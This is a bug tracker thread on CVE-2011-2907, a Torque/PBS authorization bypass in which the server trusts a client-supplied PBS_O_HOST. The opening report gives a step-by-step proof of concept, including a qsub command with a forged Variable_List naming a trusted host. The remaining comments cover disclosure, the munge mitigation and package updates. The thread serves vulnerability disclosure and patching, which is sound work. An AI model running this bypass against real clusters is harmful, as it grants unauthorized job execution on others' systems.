This vulnerability was found not by the submitter of this bug but by Bartlomiej Balcerek.pl (Bartlomiej.Balcerek.pl).

Torque, at least the recent version (3.0.1), and GLite versions (e.g. 2.3.13, 2.4.12) are vulnerable to an authorization bypass attack.

During authorization, Torque's server relies on data provided by the "qsub" client. Qsub passes the submit host name to the server (in a hidden way), and the server uses it to authenticate the request. By subverting the PBS_O_HOST parameter it is possible to bypass at least three of the four authorization mechanisms Torque uses:

1) RCmd, using the ruserok() function,
2) the "submit_hosts" server parameter,
3) the "allow_node_submit" server parameter.

The 4th mechanism, ACL (the "acl_host_enable" option), is proof against this authorization bypass.

The "orighost" value is taken from the variable pbs_o_host, which can be set on the client side:

"src/lib/Libsite/site_check_u.c":

    orighost = get_variable(pjob, pbs_o_host);

Three checks are then performed to authorize the submit host. All of them refer to the "orighost" variable.

1) "src/lib/Libsite/site_check_u.c":

    rc = ruserok(orighost, 0, owner, luser);
    if (rc != 0 && EMsg != NULL) {
      ...
      snprintf(EMsg, 1024, "ruserok failed validating %s/%s from %s", owner, luser, orighost);

2) "src/lib/Libsite/site_check_u.c":

    for (hostnum = 0;hostnum < submithosts->as_usedptr;hostnum++) {
      testhost = submithosts->as_string[hostnum];
      if (!strcasecmp(testhost, orighost)) {
        /* job submitted from host found in trusted submit host list, access allowed */

3) "src/lib/Libsite/site_check_u.c":

    if ((HostAllowed == 0) &&
        (server.sv_attr[SRV_ATR_AllowNodeSubmit].at_flags & ATR_VFLAG_SET) &&
        (server.sv_attr[SRV_ATR_AllowNodeSubmit].at_val.at_long == 1) &&
        (find_nodebyname(orighost) != NULL)) {
      /* job submitted from compute host, access allowed */

Proof of concept:

1. Pick the site you want to check for the vulnerability, and check whether its port 15001 is open to you.
2. Check its Torque version.
3. Choose a machine that is not authorized to submit jobs. You must have root access to this machine.
4. Pick an appropriate Torque version from http://www.clusterresources.com/downloads/torque/
   You can choose v. 2.3.6 to check against a Torque server <= 2.4.12.
5. Apply the attached patch, e.g.:

    patch -p1 < torque-2.3.6-customargs.patch

6. Configure and make, e.g.:

    ./configure --with-server-home=/opt/Torque-2.3.6/spool --prefix=/opt/Torque-2.3.6 --disable-server --disable-mom
    make
    make install (from root account)

7. Guess/choose any remote account name.
8. Create an account with that name on your local machine, and perform the next steps using this account.
9. Try to submit a job in the regular way, e.g.:

    echo /bin/sleep 100 | /opt/Torque-2.3.6/bin/qsub -q @<site address>

   At the end of the output you should see that your job was rejected:

    qsub: Bad UID for job execution MSG=ruserok failed validating bartol/bartol from sec.wcss.wroc.pl

10. Check the PBS_O_HOST variable in the "Variable_List" in the qsub output. It should be changed to the address of a valid "submit host". The server name itself is a good choice there.
11. Submit a job with the changed PBS_O_HOST in the variable list, e.g.:

    echo /bin/sleep 100 | /opt/Torque-2.3.6/bin/qsub -q @batch.wcss.wroc.pl -Z "Variable_List=PBS_O_HOME=/home/bartol,PBS_O_LANG=pl_PL.utf8,PBS_O_LOGNAME=bartol,PBS_O_PATH=/usr/lib64/qt-3.3/bin:/usr/NX/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin:/home/bartol/bin,PBS_O_MAIL=/var/spool/mail/bartol,PBS_O_SHELL=/bin/bash,PBS_SERVER=sec.wcss.wroc.pl,PBS_O_HOST=batch.wcss.wroc.pl,PBS_O_WORKDIR=/home/bartol"

    The submission should succeed now.
Reproducible: Always

This bug has already been reported to the Torque providers and to the EGI Software Vulnerability Group (SVG).

The EGI (http://www.egi.eu/) Software Vulnerability Group (http://www.egi.eu/policy/groups/Software_Vulnerability_Group_SVG.html) runs a process for handling reported software vulnerabilities. While our work is primarily designed to handle vulnerabilities in Grid Middleware, other vulnerabilities found in software used in the EGI infrastructure may also be reported to us. We pass the information on to the software suppliers and also consider the risk to the EGI infrastructure.
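The pattern described in the report can be illustrated with a minimal sketch. It is not Torque code: the JobRequest class, the SUBMIT_HOSTS set and both check functions are hypothetical names made up for this example, and the second check is only one possible contrast, not a description of how Torque's ACL check or any upstream fix works. The first function decides based on a host name the client supplied itself (as the "orighost" checks do), the second on the address the connection came from.

```python
from dataclasses import dataclass, field


@dataclass
class JobRequest:
    """Hypothetical model of a submission as the server sees it."""
    peer_host: str  # host the connection actually came from
    variables: dict = field(default_factory=dict)  # client-supplied Variable_List


# Stands in for the "submit_hosts" server parameter (assumed value).
SUBMIT_HOSTS = {"batch.example.org"}


def host_allowed_trusting_client(req: JobRequest) -> bool:
    # Flawed pattern: the host name comes from the job's own variable list,
    # which the submitting client controls.
    orighost = req.variables.get("PBS_O_HOST", "")
    return orighost.lower() in SUBMIT_HOSTS


def host_allowed_using_peer(req: JobRequest) -> bool:
    # Illustrative contrast: decide on data the client cannot simply rewrite.
    return req.peer_host.lower() in SUBMIT_HOSTS


# The same unauthorized machine, once honest and once with a forged PBS_O_HOST.
honest = JobRequest("attacker.example.org", {"PBS_O_HOST": "attacker.example.org"})
forged = JobRequest("attacker.example.org", {"PBS_O_HOST": "batch.example.org"})
```

With these definitions, host_allowed_trusting_client(honest) is rejected while host_allowed_trusting_client(forged) is accepted, which corresponds to steps 9 and 11 of the proof of concept. host_allowed_using_peer(forged) is still rejected.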
Hi, Linda. Thanks for this report. Has upstream responded back to your notification? Any ETA on when a fix might be delivered or when this might be made public?
Hi Vincent, I've not heard anything. Some members of the SVG are currently working on advice to mitigate the problem on EGI sites. I'll forward any information when I hear. (Sorry, not used to gmail, and keep forgetting to check it!) Linda
So upstream hasn't responded to this at all? Please keep us advised of this. Thanks!
I now have some comments from upstream, but nothing is concluded yet. The good news is that F15 and F16 are not vulnerable, since they are compiled with munge [1] support. Switching munge on mid OS release is hardly a backwards-compatible change for EPEL6. For EPEL4 and 5 and Fedora 14, the current versions are too old to even have munge support. It is, however, an option to update and add munge.

[1] http://code.google.com/p/munge/
So I poked at the code in EPEL 5 (2.3.13) and it is indeed affected by this. I don't know what the EPEL rules are regarding new packages and updating existing packages to compile against different things. I believe EPEL tries to follow RHEL-style rules when it comes to updates, so I don't know if adding munge support to those is feasible. Does this go away when munge support is enabled? I.e. is there no need for the server to obtain this orighost variable from the client as described (munge obsoletes this code, perhaps)? I'm afraid I don't fully understand how munge support makes this not vulnerable. Any further word from upstream regarding this? Perhaps something that would protect those installs that are not compiled with munge and/or don't have munge available?
Hi Vincent, As I understand it, switching to munge support basically avoids this bit of code completely; at the very least it restricts access to nodes where the shared secret is present. I think in reality the upgrade of torque itself is probably okay. Switching on munge will cause an immediate failure until a key is generated with munge-keygen and the resulting key is copied to each node within the cluster. These problems can be mitigated to a certain extent with release notes advising the pre-installation of munge and key setup before torque is upgraded. Many EPEL torque users are screaming out for the upgrade and left the EPEL version some time ago. I did have word from upstream that, given munge exists as a solution, they are not going to do anything; they are also working on something new authentication-wise for torque 4. Upstream is now in CC. Munge it is then. Oh, and thanks for digging deeper. Steve.
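To illustrate why a shared secret changes the picture, here is a minimal sketch of a credential that only holders of a common key can produce. It assumes a plain HMAC-SHA256 tag over the payload; this is not MUNGE's actual credential format, API or key handling, and make_credential, verify_credential and the key variables are names invented for the example.

```python
import hashlib
import hmac
import os

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def make_credential(key: bytes, payload: bytes) -> bytes:
    # Prefix the payload with a tag that can only be computed with the key.
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload


def verify_credential(key: bytes, credential: bytes):
    # Return the payload if the tag matches the key, otherwise None.
    tag, payload = credential[:TAG_LEN], credential[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    return payload if hmac.compare_digest(tag, expected) else None


cluster_key = os.urandom(32)   # the key copied to every node of the cluster
outsider_key = os.urandom(32)  # whatever a machine outside the cluster has

good = make_credential(cluster_key, b"uid=1000")
forged = make_credential(outsider_key, b"uid=1000")
```

Under these assumptions, verify_credential(cluster_key, good) returns the payload, while verify_credential(cluster_key, forged) returns None: a host without the cluster key cannot get a request accepted merely by claiming a different host name.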
Adaptive Computing is investigating new ways to do user authorization on the server and authorization between the server and MOM nodes. As soon as we know what method we want to use we will update you on what it is and in which versions it will be available. Regards Ken Nielson Adaptive Computing
I'm assuming that Ken is upstream here? Ken, will switching to munge solve the problem with our packages? If so, and if that is the best/cleanest way to move forward, then I would say we should do so.
Vincent, I am upstream. I would suggest switching to munge for those who can. Ken Nielson Adaptive Computing
Ken, thank you for that. Steve, I fully support getting munge into EPEL then and building torque against it. I do not, however, think we should mention the authentication bypass since I do not believe this is public information (am I correct in that regard, Ken)? While munge support will make that problem go away, it doesn't _fix_ the problem. Ken, do you have plans to correct the problem and make this information public? This would affect more than just us, regarding people that do not have munge available or having torque built against it. We would like to make this bug and the information public at some point, but definitely want to respect your timeframe and solutions. I also suspect that Linda would appreciate knowing when this would be public as well. We can assist with assigning a CVE name to this flaw, and if we can help in other ways to facilitate this (perhaps advising other vendors when a suitable patch/solution is prepared), we would like to. Please advise.
Vincent, Thank you for your consideration. Our plans are still internal and we have not made a proposal to the community yet. We would like to have a solution available by September or October. We will be discussing it with the community before that but it would be nice if they hear it directly from us first. Regards Ken Nielson Adaptive Computing
Yikes, that's quite a ways away. Ok, please just let us know when this is public. For the time being, we would like to get the munge support into Fedora and build our packages against munge, which has the added benefit of preventing this flaw. We will make this available as a bug fix or enhancement update (rebase to new version, new functionality, etc. that some people are asking for). It feels a wee bit sneaky, but we will abide by your wishes for disclosure and still get a preemptive fix out. Steve, does this work for you? If it does, please do not note this bug # or any security implications in the update. Thanks.
ACK, I'll get an update out in the next couple of days, at least to testing, before I run away for summer break. That's EL4, 5 and 6 and possibly an old Fedora. Steve.
Perfect. Thanks Steve.
Okay, builds for EPEL 6, 5 and 4 respectively: http://koji.fedoraproject.org/koji/buildinfo?buildID=255469 http://koji.fedoraproject.org/koji/buildinfo?buildID=255610 and http://koji.fedoraproject.org/koji/buildinfo?buildID=255615 6 is a fairly small jump. 4 and 5 jump from 2.3.13 to 2.5.7; from memory there are no incompatibilities between these two versions, in particular for the job database, which is what matters. Ken, maybe you know of something big between these versions? Of course, the fact that munge is now enabled is significant, and I am aware of that. Testing time..... Steve.
The only thing users need to be aware of when upgrading to 2.5.7 from 2.4.x and earlier is that job arrays are not backwards compatible. To get around this problem, administrators need to make sure that any jobs which have been submitted as job arrays are complete before upgrading. For more information see the Release_Notes in the tarball. Let me know if you need more information. Ken
https://admin.fedoraproject.org/updates/torque-2.5.7-1.el6 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el5 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el4 have been pushed to testing and now contain release notes. Testing has yet to really start, so I have disabled push on karma for now.
Is it OK if I copy and paste the formula to reproduce this security hole? We are discussing it with the community right now and they want to know the nature of the problem. Ken Nielson Adaptive Computing
(In reply to comment #18)
> are discussing it with the community right now and they want to know the nature
> of the problem.

http://www.clusterresources.com/pipermail/torqueusers/2011-August/013184.html

This is basically public, I would say. Almost: the thread wanders around it, but lots of people actually know.
Steve, Thanks. I just wanted to make sure I was not stepping on any toes. Ken
Hi Ken, I should have said: you should probably wait for a comment from Vincent, since once this is public he will probably file for a CVE. Steve.
New packages in testing for EPEL4 and 5: https://admin.fedoraproject.org/updates/torque-2.5.7-1.el4.1 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el5.1 The previous ones had a packaging bug, bug #716659. Steve.
What we should do is assign a CVE to this now, and if you want to discuss this in public, we should also make this bug public. The information on the mailing list is suitably vague, so I don't think MITRE would have picked up on it yet, so we can get the CVE assigned easily. I'm going to change this to an SRT bug and assign a CVE. Ken, let me know if making this bug public works for you; I think if you're going to discuss it and provide details, there is no point in keeping this bug private.
Ok, the name CVE-2011-2907 is assigned to this flaw. If you discuss it further on the mailing list, can you note the CVE name? Also, I would like to make this bug public since the discussion is public and the details are semi-public. I see no real value in keeping this bug private. Thanks! Steve, I changed this to an SRT bug. If you do require some Fedora/EPEL bugs to make things go through the system, please let me know and I'll create them once this bug is public.
Oh, just went through the thread a bit more and found this: http://www.clusterresources.com/pipermail/torqueusers/2011-August/013194.html so it is public. Can someone please note the CVE name in that discussion? I'd also like to inform the oss-security mailing list.
Making this public.
Vincent, We have already gone public with the bug. The TORQUE community is not too concerned since they already have safeguards in place to prevent an exploit. Regards Ken
(In reply to comment #27)
> We have already gone public with the bug. The TORQUE community is not too
> concerned since they already have safeguards in place to prevent an exploit.

That's what I thought. I notified oss-security as well, with the CVE name, so there is no confusion. Thanks Ken!
Hi Vincent, An SRT bug? Can I have EPEL4, 5 and 6 bugs then? My understanding is that this one becomes a parent to those. .... For me, one bug that I can attach to the bodhi pages would be enough. Steve.
Created torque tracking bugs for this issue Affects: epel-all [bug 730119]
(In reply to comment #29)
> An SRT bug? Can I have epel4, 5 and 6 bugs then, my understanding is
> this becomes a parent to these. .... For me one bug would be enough
> that I can attach to the bodhi pages.

Done. See bug #730119. Thanks.
These updates have had this bug attached. I presume bodhi has not added them here automatically because they had already been pushed to testing. https://admin.fedoraproject.org/updates/torque-2.5.7-1.el4.1 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el5.1 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el6
There will be another advisory here soon: https://wiki.egi.eu/wiki/SVG:Advisory-SVG-2011-2296